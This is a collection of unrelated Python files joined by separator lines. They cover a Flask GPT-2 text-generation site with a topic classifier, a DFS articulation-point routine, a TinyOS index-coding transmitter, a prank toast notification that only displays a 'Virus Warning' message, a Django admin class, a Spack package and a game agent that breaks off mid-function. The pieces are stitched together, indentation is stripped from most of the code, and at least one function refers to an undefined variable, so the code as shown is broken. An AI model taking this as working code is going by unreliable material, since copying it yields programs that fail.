file_model = joblib.load("./writrly/static/data/logreg_wordcount_model.pkl")
# clean essay element
essay = masterDF['essay']
essay = [clean_text(elem) for elem in essay]
masterDF['essay'] = essay
# create a count vectorizer object and fit it to the essay column
count_vect = CountVectorizer(analyzer='word', token_pattern=r'\w{1,}')
count_vect.fit(masterDF['essay'])
# predicts class of string or file
def predict_class(free_x):
#clean text
free_x = clean_text(free_x)
free_vect = count_vect.transform([free_x])
prediction = class_key[file_model.predict(free_vect)[0]]
return prediction, max(file_model.predict_proba(free_vect)[0])
def predict_class_file(filename):
with open(filename, 'r') as file:
free_x = file.read().replace('\n', '')
# clean text
free_x = clean_text(free_x)
free_vect = count_vect.transform([free_x])
prediction = class_key[file_model.predict(free_vect)[0]]
return prediction, max(file_model.predict_proba(free_vect)[0])
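# Hypothetical usage sketch (the input text and returned values are purely
# illustrative, not real model output): label, prob = predict_class("The senate
# passed a new budget bill today") returns one of the labels in class_key
# together with the classifier's highest class probability, e.g. ('Politics', 0.42).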
################################
# _____________________________
# | |
# | Code for Summary Extraction |
# |_____________________________|
#
################################
def sentence_similarity(sent1, sent2, stopwords=None):
if stopwords is None:
stopwords = []
    # clean_text returns a string, so split it into words before building the count vectors
    sent1 = [w.lower() for w in clean_text(sent1).split()]
    sent2 = [w.lower() for w in clean_text(sent2).split()]
all_words = list(set(sent1 + sent2))
vector1 = [0] * len(all_words)
vector2 = [0] * len(all_words)
# build the vector for the first sentence
for w in sent1:
if w in stopwords:
continue
vector1[all_words.index(w)] += 1
# build the vector for the second sentence
for w in sent2:
if w in stopwords:
continue
vector2[all_words.index(w)] += 1
return 1 - cosine_distance(vector1, vector2)
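# Worked example (assuming the word-level split above): for "the cat sat" and
# "the cat ran", clean_text drops the stopword "the", leaving ['cat', 'sat']
# and ['cat', 'ran']; the count vectors over {cat, sat, ran} are [1, 1, 0] and
# [1, 0, 1], so the returned cosine similarity is 0.5.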
def build_similarity_matrix(sentences, stop_words):
# Create an empty similarity matrix
similarity_matrix = np.zeros((len(sentences), len(sentences)))
for idx1 in range(len(sentences)):
for idx2 in range(len(sentences)):
if idx1 == idx2: #ignore if both are same sentences
continue
similarity_matrix[idx1][idx2] = sentence_similarity(sentences[idx1], sentences[idx2], stop_words)
return similarity_matrix
def generate_summary_text(text, top_n):
stop_words = stopwords.words('english')
summarize_text = []
    # Step 1 - Read the text and split it into sentences
sentences = sent_tokenize(text)
    # Step 2 - Generate the similarity matrix across sentences
sentence_similarity_martix = build_similarity_matrix(sentences, stop_words)
    # Step 3 - Rank sentences in the similarity matrix
sentence_similarity_graph = nx.from_numpy_matrix(sentence_similarity_martix)
scores = nx.pagerank(sentence_similarity_graph)
# Step 4 - Sort the rank and pick top sentences
ranked_sentence = sorted(((scores[i],s) for i,s in enumerate(sentences)), reverse=True)
#print("Indexes of top ranked_sentence order are ", ranked_sentence)
for i in range(top_n):
summarize_text.append(ranked_sentence[i][1])
    # Step 5 - Output the summarized text
#print("Summarize Text: \n",textwrap.fill(" ".join(summarize_text), 50))
return(summarize_text)
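# Usage sketch (illustrative): generate_summary_text(article_text, top_n=3)
# returns a list with the 3 sentences that received the highest PageRank
# scores in the sentence-similarity graph, in descending score order.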
################################
# _____________________
# | |
# | Code for Generators |
# |_____________________|
#
################################
# for some reason requires double loading
import encoder
# function that removes ending punctuations
def remove_end_punct(string):
reverse_string = string[::-1]
i1 = reverse_string.find('.')
i2 = reverse_string.find('?')
i3 = reverse_string.find('!')
if i1 == -1:
i1 = 1000
if i2 == -1:
i2 = 1000
if i3 == -1:
        i3 = 1000
ifinal = min([i1, i2, i3])
return string[:len(string)-ifinal]
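# Worked example: remove_end_punct("Hello there. Trailing frag") returns
# "Hello there." because the last '.', '?' or '!' in the string marks the cut;
# if no sentence-ending punctuation is found, the 1000-character sentinel above
# is used and the string may be truncated arbitrarily.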
## dictionary for model
## def print string given input
def simple_gen_str(input_string, lens, temp, model_choice):
model_name=model_choice
seed=None
raw_text = '\n\n\n\n'+input_string
length=lens
temperature=temp #set to 1.0 for highest diversity
top_k=40 #set to 40
top_p=0.9 #set to 0.9
"""
Interactively run the model
:model_name=117M : String, which model to use
:seed=None : Integer seed for random number generators, fix seed to reproduce
results
:length=None : Number of tokens in generated text, if None (default), is
determined by model hyperparameters
:temperature=1 : Float value controlling randomness in boltzmann
distribution. Lower temperature results in less random completions. As the
temperature approaches zero, the model will become deterministic and
repetitive. Higher temperature results in more random completions.
:top_k=0 : Integer value controlling diversity. 1 means only 1 word is
considered for each step (token), resulting in deterministic completions,
while 40 means 40 words are considered at each step. 0 (default) is a
special setting meaning no restrictions. 40 generally is a good value.
:top_p=0.0 : Float value controlling diversity. Implements nucleus sampling,
overriding top_k if set to a value > 0. A good setting is 0.9.
"""
# produce only a single batch
batch_size = 1
# create encoder based on chosen model
enc = encoder.get_encoder(model_name)
# selects default hyperparameters based on model
hparams = model.default_hparams()
# overrides default hyperparameters with parameters from chosen model
with open(os.path.join('models', model_name, 'hparams.json')) as f:
hparams.override_from_dict(json.load(f))
# Cannot produce number of tokens more than the hyperparameters count
if length is None:
length = hparams.n_ctx // 2
elif length > hparams.n_ctx:
raise ValueError("Can't get samples longer than window size: %s" % hparams.n_ctx)
with tf.Session(graph=tf.Graph()) as sess:
context = tf.placeholder(tf.int32, [batch_size, None])
np.random.seed(seed)
tf.set_random_seed(seed)
output = sample.sample_sequence(
hparams=hparams, length=length,
context=context,
batch_size=batch_size,
temperature=temperature, top_k=top_k, top_p=top_p
)
saver = tf.train.Saver()
ckpt = tf.train.latest_checkpoint(os.path.join('models', model_name))
# restores model from checkpoint
saver.restore(sess, ckpt)
# encodes input text
context_tokens = enc.encode(raw_text)
#runs session to generate encoded text given encoded raw text
out = sess.run(output, feed_dict={context:
[context_tokens for _ in range(batch_size)]})[:, len(context_tokens):]
#decodes output
text = enc.decode(out[0])
# remove quadruple \n at beginning of text
text = text.replace('\n\n\n\n', ' ')
# remove triple \n at end of text
text = text.replace('\n\n\n', '\n\n')
return(text)
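# Hypothetical usage sketch (the model folder name is an assumption: it must
# match a fine-tuned GPT-2 checkpoint present under ./models):
# text = simple_gen_str("Once upon a time", lens=100, temp=0.8,
#                       model_choice='atlantic_science')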
# with model chosen from text similarity or length
def class_gen_str(input_text, T, length, model_dict):
# predicts class of input text
old_class, old_prob = predict_class(input_text)
if length == None:
# text_length
length = min([950, len(word_tokenize(input_text))])
# return new text
new_string = simple_gen_str(input_string = input_text,
lens = length,
temp = T,
model_choice = model_dict[old_class])
# predicts probability of class of new string
new_class, new_prob = predict_class(new_string)
return remove_end_punct(new_string), [old_class, old_prob], [new_class, new_prob]
# with model chosen from text similarity or length
def class_extract_gen_str(input_text, T, length, model_dict):
# predicts class of input text
old_class, old_prob = predict_class(input_text)
if length == None:
# text_length
length = min([950, len(word_tokenize(input_text))])
# summary list of sentences
summ_list = generate_summary_text(text = input_text, top_n=3)
# summary list of strings
summ_string = ' '.join(summ_list)
# return new text
new_string = simple_gen_str(input_string = summ_string,
lens = length,
temp = T,
model_choice = model_dict[old_class])
# predicts probability of class of new string
new_class, new_prob = predict_class(new_string)
# computes cosine similarity
vect = TfidfVectorizer(min_df=1)
tfidf = vect.fit_transform([input_text,new_string])
#remove multiple \n
# new_string = new_string.replace('\n\n\n\n', '')
return remove_end_punct(new_string), [old_class, old_prob], [new_class, new_prob], (tfidf * tfidf.T).A, summ_list
################################
# __________________________
# | |
# | Applications for Site |
# |_________________________|
#
################################
# here's the homepage
#@application.route('/', methods=['POST', 'GET'])
#def homepage():
#
# if request.method == 'POST':
#
# gpu_status = GPU_avail()
#
# return render_template("index.html", gpu_status = gpu_status)
#
# return render_template("index.html")
# here's the homepage
@application.route('/')
def homepage():
return render_template("index.html")
# checks gpu availability
@application.route('/gpu_avail')
def gpu_avail():
gpu_status = GPU_avail()
return jsonify(result = gpu_status)
# dictionary for 345M hparam model
model_dict_345 = {'Science': 'atlantic_science_345',
'Technology': 'atlantic_technology_345',
'Business': 'atlantic_business_345',
'Ideas/Opinion': 'atlantic_ideas_345',
'Education': 'atlantic_education_345',
'International': 'atlantic_international_345',
'Politics': 'atlantic_politics_345',
'Health': 'atlantic_health_345',
'Short Story': 'all_short_stories_345',
'Entertainment': 'atlantic_entertainment_345',
'Gutenberg':'gutenberg_345'}
# dictionary for 117M hparam model
model_dict_117 = {'Science': 'atlantic_science',
'Technology': 'atlantic_technology',
'Business': 'atlantic_business',
'Ideas/Opinion': 'atlantic_ideas',
'Education': 'atlantic_education',
'International': 'atlantic_international',
'Politics': 'atlantic_politics',
'Health': 'atlantic_health',
'Short Story': 'all_short_stories',
'Entertainment': 'atlantic_entertainment',
'Gutenberg':'gutenberg'}
@application.route('/output_gen')
def text_output_gen():
entry_result = request.args.get('user_text')
temp_val = float(request.args.get('temperature'))
topic = request.args.get('topic')
length = int(request.args.get('length'))
model_type = request.args.get('model_type')
# change to 345 model if 345 is in name
if '345' in model_type:
model_dict = model_dict_345
else:
model_dict = model_dict_117
    ## the prompt is prefixed with \n\n\n\n (inside simple_gen_str) to mark the start of a new text
output_result = simple_gen_str(input_string =entry_result,
lens = length,
temp = temp_val,
model_choice = model_dict[topic] )
# remove end without punctuation
output_result = remove_end_punct(output_result)
# form = cgi.FieldStorage()
# with open ('output_text.txt','w') as fileOutput:
# #fileOutput.write(form.getValue('user_text'))
# fileOutput.write(output_result)
# removes the spontaneous line breaks learned from the corpus
if topic == 'Gutenberg':
output_result = output_result.replace('\n\n','~').replace('\n',' ').replace('~','\n\n')
return render_template("output_gen.html",
model_type = model_type,
output_text= output_result,
entered_text = entry_result,
temp = temp_val,
tops = topic,
lengs = length,
)
@application.route('/output_class_gen')
def text_output_class_gen():
entry_result = request.args.get('user_text')
temp_val = float(request.args.get('temperature'))
length = int(request.args.get('length'))
model_type = request.args.get('model_type')
# change to 345 model if 345 is in name
if '345' in model_type:
model_dict = model_dict_345
else:
model_dict = model_dict_117
    ## the prompt is prefixed with \n\n\n\n (inside simple_gen_str) to mark the start of a new text
output_result, old_class_probs, new_class_probs = class_gen_str(input_text =entry_result,
length = length,
T = temp_val,
model_dict = model_dict)
# remove end without punctuation
output_result = remove_end_punct(output_result)
# form = cgi.FieldStorage()
# with open ('output_text.txt','w') as fileOutput:
# #fileOutput.write(form.getValue('user_text'))
# fileOutput.write(output_result)
return render_template("output_class_gen.html",
model_type = model_type,
old_class = old_class_probs[0],
old_prob = round(old_class_probs[1]*100, 1),
new_class = new_class_probs[0],
new_prob = round(new_class_probs[1]*100, 1),
output_class_gen_text= output_result,
entered_text = entry_result,
temp = temp_val,
lengs = length,
)
@application.route('/output_class_ex_gen')
def text_output_class_extract_gen():
entry_result = request.args.get('user_text')
temp_val = float(request.args.get('temperature'))
length = int(request.args.get('length'))
model_type = request.args.get('model_type')
if len(sent_tokenize(entry_result)) < 3 :
return render_template("output_class_ex_gen_error.html")
else:
# change to 345 model if 345 is in name
if '345' in model_type:
model_dict = model_dict_345
else:
model_dict = model_dict_117
        ## the prompt is prefixed with \n\n\n\n (inside simple_gen_str) to mark the start of a new text
output_result, old_class_probs, new_class_probs, similarity, sum_string = class_extract_gen_str(input_text = entry_result,
length = length,
T = temp_val,
model_dict = model_dict)
# remove end without punctuation
output_result = remove_end_punct(output_result)
# form = cgi.FieldStorage()
# with open ('output_text.txt','w') as fileOutput:
# #fileOutput.write(form.getValue('user_text'))
# fileOutput.write(output_result)
return render_template("output_class_ex_gen.html",
output_class_ex_gen_text= output_result,
model_type = model_type,
summary1 = sum_string[0],
summary2 = sum_string[1],
summary3 = sum_string[2],
old_class = old_class_probs[0],
old_prob = round(old_class_probs[1]*100, 3),
new_class = new_class_probs[0],
                           new_prob = round(new_class_probs[1]*100, 3),
text_sim = similarity[0][1],
entered_text = entry_result,
temp = temp_val,
lengs = length,
)
#@application.route('/contact', methods=['GET', 'POST'])
#def contact():
# form = ContactForm()
#
# if request.method == 'POST':
# return 'Form posted.'
#
# elif request.method == 'GET':
# return render_template('contact.html', form=form)
@application.route('/slides')
def slides():
return render_template("slides.html")
@application.route('/usage')
def usage():
return render_template("usage_tips.html")
@application.route('/about')
def about():
return render_template("about.html")
@application.route('/corpora')
def corpora():
return render_template("corpora.html")
@application.route('/ethics')
def ethics():
return render_template("ethics.html")
@application.route('/index')
def index():
return render_template("index.html")
|
from tiempo import Tiempo
class DFSIterativo(object):
def __init__(self, g, v, visitado):
self.g = g
self.v = v
self.visitado = visitado
self.tiempo_visitado = {}
self.tiempo = Tiempo()
self.predecesor = {}
self.bajo = {}
self.puntos_articulacion = set()
for u in g.devolver_vertices():
self.predecesor[u] = None
def _asignar_visitado(self):
stack = [self.v]
stack_recorrido = [self.v]
while stack:
u = stack.pop()
if self.visitado[u]:
continue
self.visitado[u] = True
self.tiempo.incrementar()
self.tiempo_visitado[u] = self.tiempo.actual()
for w in self.g.adyacentes(u):
if not self.visitado[w]:
stack.append(w)
stack_recorrido.append(w)
self.predecesor[w] = u
return stack_recorrido
def _asignar_bajo(self, stack):
while stack:
u = stack.pop()
self.bajo[u] = self.tiempo_visitado[u]
for w in self.g.adyacentes(u):
if self.tiempo_visitado[w] > self.tiempo_visitado[u]:
if self.bajo[w] >= self.tiempo_visitado[u]:
self.puntos_articulacion.add(u)
self.bajo[u] = min(self.bajo[u], self.bajo[w])
elif w != self.predecesor[u]:
self.bajo[u] = min(self.bajo[u], self.tiempo_visitado[w])
def get_predecesor(self):
return self.predecesor
def get_puntos_articulacion(self):
return self.puntos_articulacion
def hacer_dfs(self):
stack_recorrido = self._asignar_visitado()
self._asignar_bajo(stack_recorrido)
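# Usage sketch (assumes a graph class exposing devolver_vertices() and
# adyacentes(v), which is not shown in this file):
#
# g = Grafo()                                   # hypothetical graph object
# visitado = {v: False for v in g.devolver_vertices()}
# dfs = DFSIterativo(g, origen, visitado)       # 'origen' is the start vertex
# dfs.hacer_dfs()
# print(dfs.get_puntos_articulacion())          # articulation points found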
|
#!/usr/bin/python
# python stuff
import time
import sys
import numpy as np
# index coding stuff
from Symbol import Symbol
from alignment import alignment, nullvec
from bs_index_coding import compute_interferers, transmit_messages, bs_decode_messages
from multirandperm import pairingperm
# tos stuff, all needed?
from TxSerialMsg import *
from SymMsg import *
from T2HMsg import *
from AckMsg import *
from tinyos.message import MoteIF
class Transmitter:
def __init__(self, N, B=1, verbose=True, dest=False): #is pieces 1 here?
self.verbose = verbose
self.prevtime = time.time()
self.N = N
#self.A = make_A_matrix(self.N)
self.counter = 0;
self.num_transmissions = 0;
self.current_row = 0;
## Set up link to tos mote
self.mif = MoteIF.MoteIF()
self.source = self.mif.addSource("sf@localhost:9002")
        #TxSerialMsg.py is generated by the MIG class
self.mif.addListener(self, TxSerialMsg)
# generate random messages
self.W = np.random.randint(0,2**16, (N,B)) # each message is an array of B uint16s
# store final received messages. goal is to "de-NaN" by the end
self.final_messages = np.nan*np.zeros((N, B))
# keep track of all transmitted and received messages/symbols
self.tx_symbols = np.array([]) # [1 -by- # of transmissions]
# keep track of number of transmissions
self.TOTAL_TRANSMISSIONS = 0
# for TDMA round also?
self.TDMA_TRANSMISSIONS = 0
# antidote matrix A
self.A = np.diag(self.W.reshape(-1)) # receiver (row) i has access to the message it plans to send
# Receiver i wants message dest[i]
# e.g. dest = [1, 0] means R0 wants W[1] and R1 wants W[0]
if dest == False:
self.dest = pairingperm(N)
if self.verbose:
print 'Message destinations chosen by pairing'
print 'dest:', self.dest
else:
self.dest = dest
mat_dest = (np.arange(self.N), np.array(self.dest))
signal_space = np.zeros((self.N,self.N))>0
signal_space[mat_dest] = True;
self.I = compute_interferers(self.A, signal_space)
self.J = self.I.astype(float)
self.J[mat_dest] = -1
self.map = np.arange(self.N)
if self.verbose:
print 'Interferer matrix is:'
print self.J
#send the first tdma packet?
def tdma_stage(self):
smsg = TxSerialMsg()
self.TDMA_MODE = 1;
self.TDleft = np.arange(self.N, dtype=np.uint8)
self.ackList = np.nan*self.TDleft
#test to send something
#smsg.set_messageid(1)
#self.mif.sendMsg(self.source, 0xFFFF, smsg.get_amType(), 0, smsg)
tm = 0;
#set packet number
while np.any(np.isnan(self.ackList)): #change while to if and call at the end of receive loop?
tm = tm + 1
for i in self.TDleft:
#mote doesnt see any of these??
self.TDMA_TRANSMISSIONS = self.TDMA_TRANSMISSIONS + 1
#smsg.set_crow(255) #something to signal tdma mode, still necessary?
smsg.set_messageid(int(i))
#for(j=len(self.dest[i])) eventually loop through J matrix columns that are -1
smsg.set_data(self.W[self.dest[i]])
#also send own message w[i] for comparison????, set to V_row?
smsg.set_V_row(self.W[i])
smsg.set_current_transmission(self.TDMA_TRANSMISSIONS)
self.mif.sendMsg(self.source, 0xFFFF, smsg.get_amType(), 0, smsg)
time.sleep(.25) #.125 too fast?
            print 'TDMA TRANSMISSION ', self.TDMA_TRANSMISSIONS, ': Motes remaining: ', self.TDleft
##call tinyos receive thread instead?
#rmsg = AckMsg(msg.dataGet())
##check for acks, remove nodes with ack type 1 from TDMAleft, record transmissions?
#newAck = rmsg.get_ACKs()
#acklist[newAck==1] = 1
print 'Finished TDMA after ', tm, ' transmissions.' #use tm or get_transmission from receive function? will it make a difference?
def receive(self,src,msg): #make this main_loop and have it call tdma_stage and index_stage?, or set different modes in the other functions
#wait
time.sleep(1)
if self.TDMA_MODE:
print 'RECEIVE FUNCTION (TDMA)'
rmsg = T2HMsg(msg.dataGet())
#check for acks, remove nodes with ack type 1 from TDMAleft, record transmissions?
newAck = rmsg.get_ACKs()
print 'Acks for transmission number ', rmsg.get_transmission(), ': ', newAck
print 'Element equal to 1: ', np.array(newAck)==1 #want this to be an array of logicals
#print self.ackList
self.ackList[np.array(newAck)==1] = 1
#self.ackList[3] = 1
#print self.ackList
self.TDleft = np.nonzero(np.isnan(self.ackList.reshape(-1)))[0] #seems to work
#call tdma_stage(self) at end if np.any(np.isnan(self.ackList)) !
else:
print 'RECEIVE FUNCTION (INDEX CODING)'
rmsgx = T2HMsg(msg.dataGet())
#check for acks, remove nodes with ack type 1 from TDMAleft, record transmissions?
newAck = rmsgx.get_ACKs()
#print 'Acks for transmission number ', rmsgx.get_transmission(), ': ', newAck
#RECEIVE FROM TARGET HERE
##INTERPRET ACKS HERE
#m_i += 1
#i += 1
#self.final_messages = final_messages
# update data structures, and now final messages and unsolved
#self.unsolved = np.array(newAck)!=1
newAck2 = np.array(newAck)
print 'RX ACKS: ' , newAck2
self.unsolved2 = newAck2[self.map] != 1
self.final_messages2 = self.final_messages
self.final_messages2[newAck2==1] = 1
#self.unsolved = self.final_messages != 1
#print 'Rx DEST ', self.dest
print 'Rx NEW UNSOLVED: ', self.unsolved2
print 'Rx NEW finalmessages: ', self.final_messages2
#self.map = np.nonzero(np.isnan(self.final_messages.reshape(-1)))[0]
#self.rx_symbols = self.rx_symbols[self.unsolved, :]
#self.J = self.J[self.unsolved, :]
#self.I = self.I[self.unsolved, :]
#self.A = self.A[self.unsolved, :]
#call compute_matrices, send to all motes at end if np.any(np.isnan(self.final_messages)), or is it if np.all(self.unsolved) and m_i < m??
def main_loop(self): #change to compute_matrixes
smsgx = TxSerialMsg()
self.TDMA_MODE = 0;
eps_vec = .5*np.ones(self.N)
i = 1
while np.any(np.isnan(self.final_messages)):
Kprime = len(self.map);
if self.verbose:
print 'Remaining ', Kprime, ' nodes are: '
print self.map
## special case for one remaining node
if Kprime == 1:
self.TOTAL_TRANSMISSIONS += 1
while not transmit_messages(1, eps_vec[self.map]):
self.TOTAL_TRANSMISSIONS += 1
self.final_messages[self.map] = self.W[self.map]
else:
## Generate next m transmissions
(V, U) = alignment('mixed', self.J, 1e-4, 100, False)
m = np.shape(V)[0]
if self.verbose:
print 'Minimum rank is ', m
# generate next symbol based on current V
L = len(self.tx_symbols);
if i == 1:
L = 0
self.unsolved = np.ones(Kprime) > 0
m_i = 0
while np.all(self.unsolved) and m_i < m:
self.tx_symbols = np.append(self.tx_symbols, Symbol(V[m_i,:], self.W, self.map))
R = transmit_messages(1, eps_vec[self.map])
if i == 1:
self.rx_symbols = R
else:
self.rx_symbols = np.bmat([self.rx_symbols, R])
if self.verbose:
print 'Transmission ', m_i+1, '/', m
print self.rx_symbols.astype(int)
self.TOTAL_TRANSMISSIONS += 1
# solve for messages if possible
(self.unsolved, final_messages) = bs_decode_messages(self.dest, Kprime, self.map,
self.rx_symbols, self.tx_symbols, self.A, self.I, self.J, self.W, self.final_messages, self.verbose)
time.sleep(.2)
print 'UNSOLVED: ', self.unsolved
print 'MAP: ' , self.map
#SEND TO TARGET HERE, rewrite these lines
#smsg.set_crow
print 'tx map ', self.map
smsgx.set_messageid(255) #now something to represent index coding, 255?
smsgx.set_data(np.dot(V[m_i],self.W,))
##also send own message w[i] for comparison????
smsgx.set_V_row(V[m_i])
smsgx.set_current_transmission(self.TOTAL_TRANSMISSIONS)
self.mif.sendMsg(self.source, 0xFFFF, smsgx.get_amType(), 0, smsgx)
#time.sleep(1) #.125 too fast?
#INTERPRET ACKS IN RECEIVE FUNCTION
m_i += 1
i += 1
self.final_messages = final_messages #still need final messages??
# update data structures
self.map = np.nonzero(np.isnan(self.final_messages.reshape(-1)))[0]
self.rx_symbols = self.rx_symbols[self.unsolved, :]
self.J = self.J[self.unsolved, :]
self.I = self.I[self.unsolved, :]
self.A = self.A[self.unsolved, :]
if self.verbose:
print 'Total number of transmissions: ', self.TOTAL_TRANSMISSIONS
return self.TOTAL_TRANSMISSIONS
# Called by the MoteIF's receive thread when a new message
# is received
#def receive(self, src, msg):
#time.sleep(1)
#m = DecodedMsg(msg.dataGet())
#self.counter = m.get_counter()
#timeformat = '%Y/%d/%m %H:%M:%S'
#print 'Received message %s: counter: %d' % (time.strftime(timeformat), self.counter)
#print ' current row: ', m.get_current_row()
#print ' true current row: ', self.current_row
#z = np.array(m.get_V_row())
#z = z[0:self.current_row+1]
#print z
#V = self.A[:m.get_current_row()+1]
##U, S, W = np.linalg.svd(V.T)
##print S
#Vnull = V[ :, [1,3,5,7] ]
##U,S,V = np.linalg.svd(Vnull.T)
##print S
#print np.matrix(Vnull).T*np.matrix(z).T
##U, s, W = np.linalg.svd(Vnull.T)
##print W.T
##print self.A[m.get_current_row()][:]
##print m.get_current_row()
##print S
##V_null = self.A[0:self.current_row+1,[1,3, 9, 14]]
##U, S, W = np.linalg.svd(V_null)
##print S
##if m.get_perform_svd() == self.N:
###print ' svd received:'
##Svals = m.get_W()
##print 'Rx svd: ', Svals
##U,S,V = np.linalg.svd(self.A)
###S = [s**2 for s in S]
###print ' svd check:'
##print 'PC svd: ', S
##self.perform_svd = 0
##self.A = make_A_matrix(self.N)
##print 'MSE: ', np.linalg.norm(np.array(S)-np.array(Svals),2)
##proctime = time.time() - self.prevtime
##print 'Elapsed time: %f seconds' % proctime
##else:
##self.prevtime = time.time()
##self.perform_svd += 1
#self.counter += 1
#self.current_row = (self.current_row + 1) % self.N
##if self.current_row == 0:
##self.A = make_A_matrix(self.N)
#self.send()
#uncomment this?? is it still useful?
def send(self,m_i):
smsg = TxSerialMsg()
#smsg.set_counter(self.counter)
smsg.set_crow(self.current_row)
#smsg.set_V_row(self.A[self.current_row])
smsg.set_V_row(V[m_i,:])
smsg.set_data(self.tx_symbols[:,m_i])
Symbol(V[self.current_row,:], self.W, self.map)
smsg.set_data(self.sym[self.current_row])
self.mif.sendMsg(self.source, 0xFFFF, smsg.get_amType(), 0, smsg)
#TDMA round, send message j to mote self.dest[j]
#def make_A_matrix(N):
#A = np.random.randn(N,N)
#B = np.matrix(np.random.randn(4,4))
#U, s, W = np.linalg.svd(B)
#s[-1] = 0
#B = np.array(U*np.diag(s)*W)
#
#
#A[0:4,1] = B[:,0]
#A[0:4,3] = B[:,1]
#A[0:4,5] = B[:,2]
#A[0:4,7] = B[:,0]
##print A
#
#
#
#return A
if __name__ == "__main__":
print "Running"
np.set_printoptions(precision=3)
np.set_printoptions(suppress=True)
if len(sys.argv) > 1:
N = int(sys.argv[1])
else:
N = 6
m = Transmitter(N, verbose=True)
m.tdma_stage()
m.main_loop()
time.sleep(1)
#m.send()
|
from win10toast import ToastNotifier
toaster = ToastNotifier()
for i in range(10):
toaster.show_toast("Virus Warning","Stealing data",icon_path="favicon.ico",duration=2)
toaster.show_toast("Example two","This notification is in it's own thread!",icon_path=None,duration=2,threaded=True)
|
from django.contrib import admin
from import_export.admin import ImportExportModelAdmin
from .models import Organization
from .resources import OrganizationResource
@admin.register(Organization)
class OrganizationAdmin(ImportExportModelAdmin):
list_display = [
'code',
'name',
]
model = Organization
resource_class = OrganizationResource
|
from .effunet import EffUnet
from .unext import UneXt50
from .emanet import EMANet
|
# Write a program which accepts a sequence of comma-separated numbers from
# console and generate a list and a tuple which contains every number.
# Suppose the following input is supplied to the program:
# 34,67,55,33,12,98
# Then, the output should be:
# ['34', '67', '55', '33', '12', '98']
# ('34', '67', '55', '33', '12', '98')
def trim(x):
return x.strip()
string = input('Provide me numbers (separated by comma): ')
numbers = string.split(',')
numbers = list(map(trim, numbers))
print(numbers)
print(tuple(numbers))
|
from spack import *
import sys,os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../common'))
from scrampackage import write_scram_toolfile
class Lwtnn(CMakePackage):
homepage = "http://www.example.com"
url = "https://github.com/lwtnn/lwtnn/archive/v1.0.tar.gz"
version('2.4', 'e323debb51fdd251e7f74238f757a952')
version('1.0', 'bb62cd8c1f0a97681206894f7f5a8e95')
depends_on('boost')
depends_on('eigen')
depends_on('cmake', type='build')
def setup_environment(self, spack_env, run_env):
spack_env.set('BOOST_ROOT', self.spec['boost'].prefix)
spack_env.set('EIGEN_ROOT', self.spec['eigen'].prefix)
def cmake_args(self):
args= (
'-DCMAKE_CXX_COMPILER=g++',
'-DCMAKE_CXX_FLAGS=-fPIC',
'-DCMAKE_BUILD_TYPE=Release',
'-DBUILTIN_BOOST=OFF',
'-DBUILTIN_EIGEN=OFF')
return args
|
#!/usr/bin/python3
# ^^ note the python directive on the first line
# COMP 9414 agent initiation file
# requires the host is running before the agent
# designed for python 3.6
# typical initiation would be (file in working directory, port = 31415)
# python3 agent.py -p 31415
# created by Leo Hoare
# with slight modifications by Alan Blair
import copy
import sys
import socket
# declaring visible grid to agent
view = [['' for _ in range(5)] for _ in range(5)]
obstacle = ['T']
water = ['~']
pickable = ['a', 'k', 'o', '$', ' ']
mapping_table = {(0, 1, '^'): ['r', 'f'], (0, 1, '>'): ['f'], (0, 1, 'v'): ['l', 'f'], (0, 1, '<'): ['l', 'l', 'f'],
(0, -1, '^'): ['l', 'f'], (0, -1, '>'): ['l', 'l', 'f'], (0, -1, 'v'): ['r', 'f'], (0, -1, '<'): ['f'],
(1, 0, '^'): ['l', 'l', 'f'], (1, 0, '>'): ['r', 'f'], (1, 0, 'v'): ['f'], (1, 0, '<'): ['l', 'f'],
(-1, 0, '^'): ['f'], (-1, 0, '>'): ['l', 'f'], (-1, 0, 'v'): ['l', 'l', 'f'], (-1, 0, '<'): ['r', 'f']}
get_direction = {(0, 1): '>', (0, -1): '<', (1, 0): 'v', (-1, 0): '^'}
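# Note (added for clarity): mapping_table maps (row delta, column delta,
# current facing) to the turn/forward commands needed to step onto the
# neighbouring cell, e.g. mapping_table[(0, 1, '^')] == ['r', 'f'] means
# "turn right, then move forward" when facing up and moving one column right.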
class Node:
def __init__(self, value, point):
self.value = value
self.point = point
self.parent = None
self.visited = False
self.H = 0
self.G = 0
def move_cost(self, other):
return 0 if self.value == '.' else 1
class Agent:
def __init__(self):
self.inventory = {'a':False, 'k':False, '$':False, 'r':0, 'o':0}
self.axe_location = []
self.key_location = []
self.stepping_stone = []
self.space_location = []
self.water_location = []
self.tree_location = []
self.gold_location = []
self.door_location = []
self.unvisitedwater = []
        self.unvisited = [] # used to store all the walkable but unvisited cells
self.agent_x = 80
self.agent_y = 80
self.direction = '^' # Always consider the agent direction is '^'
self.grid = [[ '?' for i in range(160)] for j in range(160)] # create a 2d list that store all the Node objects
for x in range(len(self.grid)):
for y in range(len(self.grid[x])):
self.grid[x][y] = Node(self.grid[x][y], (x, y))
self.pending_move = [] # list to store the pending moves
# Helper function
def rotate(self, view, time): # rotate 2d list clockwise
for _ in range(time):
temp = zip(*view[::-1]) # return a list of tuples
view = [list(elem) for elem in temp] # convert list of tuples to list of lists
return view
# helper function
def can_move(self):
node = self.get_front_tail()
        if node.value in pickable or node.value in obstacle:
return True
return False
def print_list(self, input_list):
print('\n'.join(map(''.join, input_list)))
    # returns the cell in front of the agent
    def get_front_tail(self): # get the grid cell in front of the agent
if self.direction == '^':
x = self.agent_x - 1
y = self.agent_y
elif self.direction == '>':
x = self.agent_x
y = self.agent_y + 1
elif self.direction == 'v':
x = self.agent_x + 1
y = self.agent_y
else:
x = self.agent_x
y = self.agent_y - 1
return self.grid[x][y]
#######################################################################################
########## Line 95 to Line 170, Update the self.grid list from view and from move
#######################################################################################
def update_from_view(self, view):
# Rotate the view based on which direction the agent is facing
if self.direction == '>':
view = self.rotate(view, 1)
if self.direction == 'v':
view = self.rotate(view, 2)
if self.direction == '<':
view = self.rotate(view, 3)
self.grid[self.agent_x][self.agent_y].visited = True
self.grid[self.agent_x][self.agent_y].value = self.direction
# Iterate through the view and update the internal map
for i in range(5):
for j in range(5):
x = self.agent_x - (2 - i)
y = self.agent_y + (j - 2)
self.grid[x][y].value = view[i][j]
# stored all adjacent cells which can actually walk through
if view[i][j] in pickable:
if (i == 1 and j == 2) or (i == 2 and j == 1) or (i == 2 and j == 3) or (i == 3 and j == 2):
if (x, y) not in self.unvisited and self.grid[x][y].visited == False:
self.unvisited.append((x, y))
if view[i][j] == '~':
if (i == 1 and j == 2) or (i == 2 and j == 1) or (i == 2 and j == 3) or (i == 3 and j == 2):
